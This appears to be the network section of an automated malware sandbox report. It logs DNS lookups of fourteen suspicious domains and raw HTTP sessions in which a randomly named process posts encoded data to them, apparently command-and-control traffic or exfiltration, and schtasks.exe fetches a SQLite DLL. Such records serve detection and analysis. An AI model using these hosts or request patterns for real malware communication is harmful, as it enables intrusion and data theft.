                                                                                        Oct 9, 2024 12:52:04.221817970 CEST5482153192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:52:04.607713938 CEST53548218.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:52:17.944811106 CEST5471953192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:52:17.961107016 CEST53547198.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:53:10.037146091 CEST4988153192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:53:10.048382044 CEST53498818.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:53:23.167630911 CEST5499853192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:53:23.175101042 CEST53549988.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:53:36.451114893 CEST5278153192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:53:36.464194059 CEST53527818.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.031455040 CEST6392653192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:53:50.218213081 CEST53639268.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:54:03.547454119 CEST6551053192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:54:03.588085890 CEST53655108.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:54:16.895313978 CEST6267253192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:54:16.973433018 CEST53626728.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:54:30.302791119 CEST5647553192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:54:30.311897039 CEST53564758.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:54:43.882550955 CEST4938453192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:54:43.916615963 CEST53493848.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:54:57.158693075 CEST5484253192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:54:57.897367001 CEST53548428.8.8.8192.168.2.22

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 9, 2024 12:51:21.935492992 CEST192.168.2.228.8.8.80x3728Standard query (0)www.itemsort.shopA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:27.491494894 CEST192.168.2.228.8.8.80x3ca5Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:37.588501930 CEST192.168.2.228.8.8.80xf354Standard query (0)www.rudemyvague.infoA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:50.878993034 CEST192.168.2.228.8.8.80x9a39Standard query (0)www.gws-treinamento2.shopA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:52:04.221817970 CEST192.168.2.228.8.8.80x3ccStandard query (0)www.sailforever.xyzA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:52:17.944811106 CEST192.168.2.228.8.8.80xf98aStandard query (0)www.launchdreamidea.xyzA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:10.037146091 CEST192.168.2.228.8.8.80x922eStandard query (0)www.mondayigboleague.infoA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:23.167630911 CEST192.168.2.228.8.8.80x9d05Standard query (0)www.stocksm.funA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:36.451114893 CEST192.168.2.228.8.8.80x2c35Standard query (0)www.drevohome.shopA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:50.031455040 CEST192.168.2.228.8.8.80x19e6Standard query (0)www.givingaway123.netA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:03.547454119 CEST192.168.2.228.8.8.80xcc8Standard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:16.895313978 CEST192.168.2.228.8.8.80xa9a9Standard query (0)www.030002837.xyzA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:30.302791119 CEST192.168.2.228.8.8.80xd49aStandard query (0)www.ethetf.digitalA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:43.882550955 CEST192.168.2.228.8.8.80x2929Standard query (0)www.booosted.xyzA (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:57.158693075 CEST192.168.2.228.8.8.80x6762Standard query (0)www.djazdgc.tokyoA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 9, 2024 12:51:21.950959921 CEST8.8.8.8192.168.2.220x3728No error (0)www.itemsort.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:21.950959921 CEST8.8.8.8192.168.2.220x3728No error (0)www.itemsort.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:27.500324011 CEST8.8.8.8192.168.2.220x3ca5No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:37.604027987 CEST8.8.8.8192.168.2.220xf354No error (0)www.rudemyvague.info52.13.151.179A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:50.910748959 CEST8.8.8.8192.168.2.220x9a39No error (0)www.gws-treinamento2.shopgws-treinamento2.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:51:50.910748959 CEST8.8.8.8192.168.2.220x9a39No error (0)gws-treinamento2.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:52:04.607713938 CEST8.8.8.8192.168.2.220x3ccNo error (0)www.sailforever.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:52:17.961107016 CEST8.8.8.8192.168.2.220xf98aNo error (0)www.launchdreamidea.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:52:17.961107016 CEST8.8.8.8192.168.2.220xf98aNo error (0)www.launchdreamidea.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:10.048382044 CEST8.8.8.8192.168.2.220x922eNo error (0)www.mondayigboleague.infomondayigboleague.infoCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:10.048382044 CEST8.8.8.8192.168.2.220x922eNo error (0)mondayigboleague.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:10.048382044 CEST8.8.8.8192.168.2.220x922eNo error (0)mondayigboleague.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:23.175101042 CEST8.8.8.8192.168.2.220x9d05No error (0)www.stocksm.funwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:23.175101042 CEST8.8.8.8192.168.2.220x9d05No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:36.464194059 CEST8.8.8.8192.168.2.220x2c35No error (0)www.drevohome.shop54.38.220.85A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:53:50.218213081 CEST8.8.8.8192.168.2.220x19e6No error (0)www.givingaway123.net103.224.182.242A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:03.588085890 CEST8.8.8.8192.168.2.220xcc8No error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:16.973433018 CEST8.8.8.8192.168.2.220xa9a9No error (0)www.030002837.xyz030002837.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:16.973433018 CEST8.8.8.8192.168.2.220xa9a9No error (0)030002837.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:30.311897039 CEST8.8.8.8192.168.2.220xd49aNo error (0)www.ethetf.digitalethetf.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:30.311897039 CEST8.8.8.8192.168.2.220xd49aNo error (0)ethetf.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:30.311897039 CEST8.8.8.8192.168.2.220xd49aNo error (0)ethetf.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:43.916615963 CEST8.8.8.8192.168.2.220x2929No error (0)www.booosted.xyzbooosted.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:43.916615963 CEST8.8.8.8192.168.2.220x2929No error (0)booosted.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:43.916615963 CEST8.8.8.8192.168.2.220x2929No error (0)booosted.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:57.897367001 CEST8.8.8.8192.168.2.220x6762No error (0)www.djazdgc.tokyolongg002.cnCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 9, 2024 12:54:57.897367001 CEST8.8.8.8192.168.2.220x6762No error (0)longg002.cn8.210.49.139A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.itemsort.shop
                                                                                        • www.sqlite.org
                                                                                        • www.rudemyvague.info
                                                                                        • www.gws-treinamento2.shop
                                                                                        • www.sailforever.xyz
                                                                                        • www.launchdreamidea.xyz
                                                                                        • www.mondayigboleague.info
                                                                                        • www.stocksm.fun
                                                                                        • www.drevohome.shop
                                                                                        • www.givingaway123.net
                                                                                        • www.jagdud.store
                                                                                        • www.030002837.xyz
                                                                                        • www.ethetf.digital
                                                                                        • www.booosted.xyz

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.2249163188.114.97.3801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:21.968657017 CEST475OUTGET /qw71/?op9=BLtTm0V&jnQX=+N/0E0v6NJCVb806DMB0CZmH+23dphvoX4nqdcW8deD1xdZOlnbQi9bOuP5MTQFhk1MFTYVpuSFcpFTZFESSLFlEbVNSdqMunFXh13AQ5nMFb0g8ejQn+jENhOCu HTTP/1.1
                                                                                        Host: www.itemsort.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:51:22.542781115 CEST766INHTTP/1.1 404
                                                                                        Date: Wed, 09 Oct 2024 10:51:22 GMT
                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTxz7ElN2lqzjcc7jSsty7YTZaXzLG40XGnNaaQWCg2ErCqE3H855MIDRUQcK7k6e1j30Rlqmhno45L5a%2FJebGtp9wYf0ZJ1%2BI%2BKEkB1CRX%2Bi%2BKwVHG7VVXLCNImAtzFVjTRRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cfdd0a8c9bc0f6c-EWR
                                                                                        Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.224916445.33.6.223803332C:\Windows\SysWOW64\schtasks.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:27.517379045 CEST270OUTGET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Host: www.sqlite.org
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Oct 9, 2024 12:51:28.057966948 CEST1236INHTTP/1.1 200 OK
                                                                                        Connection: keep-alive
                                                                                        Date: Wed, 09 Oct 2024 10:51:27 GMT
                                                                                        Last-Modified: Fri, 08 Feb 2019 13:45:40 GMT
                                                                                        Cache-Control: max-age=120
                                                                                        ETag: "m5c5d8804s75419"
                                                                                        Content-type: application/zip; charset=utf-8
                                                                                        Content-length: 480281
                                                                                        Data Raw: 50 4b 03 04 14 00 00 00 08 00 0c 03 48 4e 8e f8 a0 df 28 05 00 00 a1 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 c7 69 5c 5c c7 69 5c 5c 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 72 dc 36 0c 80 ef 79 9b c4 1d 4f 5f 20 e7 66 d2 1e 7a d3 50 12 a4 e5 98 22 15 fe 78 bd 7e fa 82 3f bb 04 48 6e 7a b2 f1 41 24 41 08 80 80 fd fe ef 8f bf 7e fe f3 f7 17 f7 4b 49 0f 2f 93 d8 77 0b bb f0 30 2d 46 7b f8 f0 43 4d d0 84 07 6f 26 7c 10 b4 93 46 3f f0 2c 96 b7 70 4e 9b d4 d2 5d 5a 8a d0 b7 ec 14 3b f0 9d 8b c2 c2 21 70 81 de 5b 85 f3 70 56 26 f5 3a cd ca cc 3d 79 fd 83 b3 d5 84 59 01 67 92 9e 5b 40 bb 4e 07 a5 38 39 85 15 07 78 b0 8d 4f 1a 25 4a f0 f1 4c a9 f1 6f a3 33 78 38 58 0e d9 bb 78 90 af af 3d 6b cd 7e 17 2a 34 27 7c 82 35 bd af ee 94 6e 80 e2 34 df 3c 38 8e 16 65 1c 70 64 4e d0 9c 58 10 6b 4b fa a7 ae 16 ff af 28 b8 db 74 11 7a 55 d4 01 11 7a 79 80 09 d5 07 8b d0 0b a8 67 e1 b7 e0 1e 3b b1 7a 51 20 6c ba 26 06 12 c5 f4 1e 49 9a de bf 55 60 94 12 1e f7 9d 34 c0 0a eb 53 [TRUNCATED]
                                                                                        Data Ascii: PKHN(sqlite3.defUTi\\i\\uxr6yO_ fzP"x~?HnzA$A~KI/w0-F{CMo&|F?,pN]Z;!p[pV&:=yYg[@N89xO%JLo3x8Xx=k~*4'|5n4<8epdNXkK(tzUzyg;zQ l&IU`4Syxgy@/f6)WX+x*{x82qlrD+f&a'~F)zMp,S0&w*Fu.R5xL}7*Y~fa+&&oR)HI^s]3Z8wa,8/|YMX#1`5_]HkeXpJK"5N+,)dQjgc~``YY(4o1{H_z/Ry5WY^LUI(SJI:_v"EJqZVeG]gjHX{aZ:T#$HqhJE@INi[8her|i9IDel%94*LI,I:!h^gR<*4u*oL>EG{z$PXYBXL__{6#@o)N ]>i5_FK>
                                                                                        Oct 9, 2024 12:51:28.058020115 CEST1236INData Raw: dc a0 98 47 f6 bc 82 ba 4b f0 d8 1d d4 50 74 0a c8 64 e8 74 53 a1 9c d9 b0 67 03 71 36 e5 b4 e1 e4 f6 ce 04 bb 00 3d 92 7c 21 9b 0f 7c 16 e9 62 3a a6 c6 4a 95 e6 19 4e ba 96 22 d1 6e 67 3b 89 f3 a4 05 ab 22 a1 d4 80 e2 18 64 07 78 63 ac fd 92 47
                                                                                        Data Ascii: GKPtdtSgq6=|!|b:JN"ng;"dxcGv((8v(wp&wxm0k,p];/5QQNlo<vXK#n56,lL1^"yP)&ksAl$%Lr] S&B.6-`a
                                                                                        Oct 9, 2024 12:51:28.058053970 CEST1236INData Raw: 3a 20 20 0f 9a 85 ca 4f 21 0d 32 cf c3 86 c9 d0 30 56 a1 bc df be 7a cd a3 fb 6c 26 d2 af 7c 74 33 6b d1 30 c7 52 a4 ee 27 df 44 3a ec ea a7 45 3c bd 17 2b d5 66 41 7d ee 06 a1 d2 c6 99 c6 ea 3d 01 f5 92 5e a8 f2 5a a3 ca 33 ae 53 46 a5 9c 50 79
                                                                                        Data Ascii: : O!20Vzl&|t3k0R'D:E<+fA}=^Z3SFPyd_LKIUO0f)M9<."In{lrv&c.p8<7qqo`H8G}fWdaoj)f\uM1#Bs}_XhFK/q/)M&
                                                                                        Oct 9, 2024 12:51:28.058085918 CEST1236INData Raw: 47 3e d0 41 c0 9a df 83 a1 9a 44 ab b2 2d 9c 7e 52 9a 7c cf 0a 2b 27 09 d5 2b d2 c2 59 1a 5f fd 08 fc e4 6a e7 56 37 f2 e9 a6 31 32 41 1a 0b 5d a7 84 5a db 5c a1 36 73 0e 69 16 6a f7 3e f6 f6 85 12 a1 96 e0 4f ea 90 14 e3 ad ac 93 ce ae 26 cd 46
                                                                                        Data Ascii: G>AD-~R|+'+Y_jV712A]Z\6sij>O&FMiMxn]lkb{2LYt%Um,iB-(o!NQkK9dek{irG)aN&_+c*|=lx|b.$`fIWSf
                                                                                        Oct 9, 2024 12:51:28.058120012 CEST1236INData Raw: c2 fe 8c a7 7a c6 96 8e cc 45 8d c7 2e 77 d9 33 b9 d9 75 37 9a 7a c3 e1 18 3c 35 34 b8 9d 37 d5 1d ba c0 77 72 20 1c 8e b0 40 d4 67 27 c0 35 53 9f 8d 31 20 cd cf 87 80 69 1e 4f d4 63 73 20 b6 20 82 59 85 28 fb 5a a1 53 19 52 6f 60 8e b2 85 b3 38
                                                                                        Data Ascii: zE.w3u7z<547wr @g'5S1 iOcs Y(ZSRo`8klwMG/rv{)E61@V;|>WJESobL5_+dB3 0c(9~6]}]wB9-3}VWWVuJ`
                                                                                        Oct 9, 2024 12:51:28.058152914 CEST1236INData Raw: 1c 54 ae 46 bc 5e 52 4e 29 de 98 90 45 76 ba c8 49 3e c4 48 ba 3a 33 0f e4 03 d2 0c 2c f2 6b b0 3c 84 3f 5d 1c 38 c7 28 d6 22 9e fb 0a e1 b7 ab 0f 60 2b 0d b6 34 f4 f0 48 38 ac 9f 06 80 bc f4 13 b6 ed 07 cb 27 03 4d 90 92 82 e5 bc 89 11 08 69 06
                                                                                        Data Ascii: TF^RN)EvI>H:3,k<?]8("`+4H8'Mit6tmq)_h^(R/qa]|E>+5\/i#4a\:prMy9Fg]Vnkf%Il!'w!M7b_`zZ;$q}-Hof&
                                                                                        Oct 9, 2024 12:51:28.058187008 CEST1236INData Raw: 5d 26 07 04 4e e3 1e 04 7c 6c 47 d1 ef 16 00 00 32 8e fb b0 d8 e3 6e 12 d5 55 64 f0 61 bd 49 c2 9e bc 9c e0 63 dc 50 69 93 e7 0e 5c ed e4 40 29 5d 9a 97 bb b8 ba 20 47 d8 d3 46 57 bc 54 5e 4a f2 72 69 9e 48 0a c4 62 9a 95 17 b2 0c 45 d0 8d 34 28
                                                                                        Data Ascii: ]&N|lG2nUdaIcPi\@)] GFWT^JriHbE4(`Cz17jK$RmL(eU-ll(fDwG59|_Le.VMd&M0IdvB}#$wu\PGf]B;6-A[)]R NKZv|
                                                                                        Oct 9, 2024 12:51:28.058219910 CEST1236INData Raw: d6 48 93 fd 3d b8 ff 4e fb 8c 89 24 8f c3 1e 0c 64 29 98 39 db 24 15 29 5b e7 71 ae 53 57 94 ee 17 93 58 69 d1 28 dd ab 9e e8 66 45 6f 0e 66 ce 35 51 7f af 94 54 d5 a6 2c 9d a7 6b 02 89 d3 49 b3 ba 86 65 d0 b1 56 17 b9 c7 4e e8 a1 d3 d7 d2 02 be
                                                                                        Data Ascii: H=N$d)9$)[qSWXi(fEof5QT,kIeVN.~D@IMn@M,zKz&;](>auAfgyd%9^:1;0um\g5X"vSzEOx@m/1d[,*B`4bwS?
                                                                                        Oct 9, 2024 12:51:28.058254957 CEST1236INData Raw: 2a 38 92 6d dc a4 57 dc 02 53 33 4f d7 e7 98 a7 df a1 f3 a2 4d 81 9d b4 59 2d 01 d4 d7 12 b2 b4 73 90 d7 ce 0e 6d 7b 3e 40 56 f5 b5 81 a1 dd 78 1f eb 61 b7 b2 c2 83 fb aa 73 a7 68 53 01 ee 24 03 e8 7b 39 da d1 f7 72 00 6b ab db c7 c7 d8 10 d3 90
                                                                                        Data Ascii: *8mWS3OMY-sm{>@VxashS${9rk@r^]0IgG^GR]+P]V5.M\8Y6&,XhT<2mQfLm<t_Lr_1=E|G~Q6RVs"Un/#`\n#||!%Z,
                                                                                        Oct 9, 2024 12:51:28.058294058 CEST1236INData Raw: ae 14 25 e9 d7 af 75 ce 52 9a 51 ea de 64 15 1e 6c ce 95 1b ec 72 9d bd d4 2d 7d 29 85 5c 75 b4 b8 bb 34 e3 61 6b e0 46 bc 14 98 4a fd 5d a5 19 cb 12 08 4c 97 af 1b cf a9 18 65 09 00 c8 65 09 ba 78 97 3c be 81 31 b5 a1 8e 40 a2 7b 45 b5 55 9a 8e
                                                                                        Data Ascii: %uRQdlr-})\u4akFJ]Leex<1@{EURJ}.W=K`jxbQp[A_hsLI=,zKZ 7Jl!T7z<lbog$6qReS Q'l^rr/P+|
                                                                                        Oct 9, 2024 12:51:28.063237906 CEST1029INData Raw: 50 e0 16 2a 5f 65 8d eb 09 96 73 b7 7e c8 94 a9 ed 98 0c d4 b7 42 1e 4e 10 37 7b b5 de 26 0e 9f 55 85 5e b7 e0 3d c9 4c 0c fe 84 05 67 61 f0 05 16 64 a0 b7 b2 e0 63 18 7c 8e 05 1f c7 60 29 04 01 f8 2d d2 64 a1 b6 c0 fc 21 5e 7a c0 90 cd 69 e2 f0
                                                                                        Data Ascii: P*_es~BN7{&U^=Lgadc|`)-d!^zis(S3Z-E{s0PObN5q@+Yy^bm<xdo54T(rc5qlP_EQk1uVBo!$P`6>_jt,>!(N


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.224916552.13.151.179801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:37.627902031 CEST2472OUTPOST /t7t4/ HTTP/1.1
                                                                                        Host: www.rudemyvague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.rudemyvague.info
                                                                                        Referer: http://www.rudemyvague.info/t7t4/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6b 51 42 70 76 43 53 37 54 5a 65 59 2f 30 50 75 73 5a 55 38 4f 75 72 76 44 4b 39 76 30 51 62 61 6f 4b 6d 4f 77 58 37 44 67 2f 4e 6a 2f 56 35 43 39 49 44 50 56 55 48 51 37 49 35 70 6d 79 6d 62 6f 48 63 71 37 79 51 4f 6e 71 63 50 53 69 71 6a 54 36 70 64 2b 6f 74 48 52 42 71 72 35 5a 39 6b 36 33 2b 42 30 5a 58 2b 6c 56 6b 75 2b 75 73 62 33 4e 55 6c 38 51 54 30 54 56 51 30 72 77 48 7a 65 34 6c 78 43 36 79 31 59 42 2f 33 63 6e 75 43 41 63 57 55 56 58 43 61 62 75 46 4f 76 61 6c 42 56 41 71 4d 4f 4d 6e 41 30 49 6d 35 66 6c 33 5a 32 56 7a 5a 6b 38 55 6f 46 39 30 62 4e 72 4f 54 56 75 62 37 68 65 33 71 70 6a 42 6a 31 6f 4e 74 65 6c 71 59 76 32 74 42 63 6c 61 64 2f 39 76 42 46 54 71 4a 69 57 6d 79 77 6e 6e 72 6d 67 35 73 33 74 57 51 42 32 5a 32 63 5a 6e 76 67 44 51 31 46 41 30 5a 4d 57 74 65 57 46 34 71 7a 6d 4c 66 44 62 4d 4a 66 54 47 34 6f 58 47 6f 7a 73 79 44 57 44 2b 56 6e 7a 56 46 44 71 30 4c 45 4b 35 7a 53 2f 4b 48 65 66 72 50 63 6c 6d 42 67 36 41 49 [TRUNCATED]
                                                                                        Data Ascii: jnQX=EOsfGuNEzgm/VkQBpvCS7TZeY/0PusZU8OurvDK9v0QbaoKmOwX7Dg/Nj/V5C9IDPVUHQ7I5pmymboHcq7yQOnqcPSiqjT6pd+otHRBqr5Z9k63+B0ZX+lVku+usb3NUl8QT0TVQ0rwHze4lxC6y1YB/3cnuCAcWUVXCabuFOvalBVAqMOMnA0Im5fl3Z2VzZk8UoF90bNrOTVub7he3qpjBj1oNtelqYv2tBclad/9vBFTqJiWmywnnrmg5s3tWQB2Z2cZnvgDQ1FA0ZMWteWF4qzmLfDbMJfTG4oXGozsyDWD+VnzVFDq0LEK5zS/KHefrPclmBg6AILnSt0//zeza7COp2FSMw0wRVDOk8/U3y0x+VWE3Cju1YvKd7PGHPs3rJd4ukLZrGRMGMTXcqEP5pUTImsQ+/INvwweXV4T7I/6LwGQYy1CKIKIpadLzaUPOplq7U2PX1yD75MQRqczOm6cWQpCtfYThHZcdsDFSwCuOn+ALjn131qaYNx/Vly1DtwiqOmoKLde4jVZQSRzVD6ONGO7E60/D+fx035S5fvbhYyeYzKD3/KanKDn2nc1AnqYILqmjTdpK6Z8/Qrrdwm2dAmRH8J9GY4quZy9kovQWw9479WA394eanKMDcCfb1n/LX3dH2xMo2qj42M0XvSR+9mU6RKnOXe/okhjVZq3OCL2IPMDjqxORZctPhBfyKBIWpQH55UOX+kk63Wj17sqhXgSImzVBX+CKVMtDJlBFQ0Kv4EAgPSxfVAUCerR5gP+tBQXS8coNLv4QbD00v9eBEvhPvPFAeqSDBXegVF8EhE2tbT3SS+3crVUQJjqja3E+hun8laBnY6MlwBFi4fRb8IDbJGJL9xqAwndXmuPCKvfDF4yhJ+QUsComTNeZySH9aSdQBdXBotJmgss5S0zySGuJ3Qw9gHqRxJ3Z148vuIi2QvE9PoNenbDsnkr8QI1yc61VpKNgzHCZ2wRrkTP26KBrzkSqi1ilVuFAB7L [TRUNCATED]
                                                                                        Oct 9, 2024 12:51:37.633090973 CEST240OUTData Raw: 59 41 77 61 58 6e 79 47 4e 4d 34 2f 68 33 32 43 66 59 6b 66 33 57 4c 62 55 65 53 47 30 6a 69 57 64 75 47 4f 6f 59 55 37 79 52 33 77 33 57 33 79 51 7a 75 50 47 41 73 57 67 52 36 6d 6c 73 73 34 46 66 57 4c 58 37 33 43 38 56 4b 2b 54 4c 46 48 66 59
                                                                                        Data Ascii: YAwaXnyGNM4/h32CfYkf3WLbUeSG0jiWduGOoYU7yR3w3W3yQzuPGAsWgR6mlss4FfWLX73C8VK+TLFHfYme4oar5dWT3lkEQvD/EKNWdVxAW708zRP40Qs5x+WiLG8/WDh6DXBB8zklgrlSMzmv0p6bMkaUJhwt1yODJdNqO3W7LfRWNbrDnHTyUJqNIwUzS60kH5pUfUhDTmlYLlLaN71dNp2+feC2OUyglgSaAkKBmoKH
                                                                                        Oct 9, 2024 12:51:38.205492973 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.10.3
                                                                                        Date: Wed, 09 Oct 2024 10:51:38 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        X-Powered-By: PHP/5.3.3
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Permissions-Policy: geolocation=(), microphone=()
                                                                                        Expires: 0
                                                                                        Content-Encoding: gzip
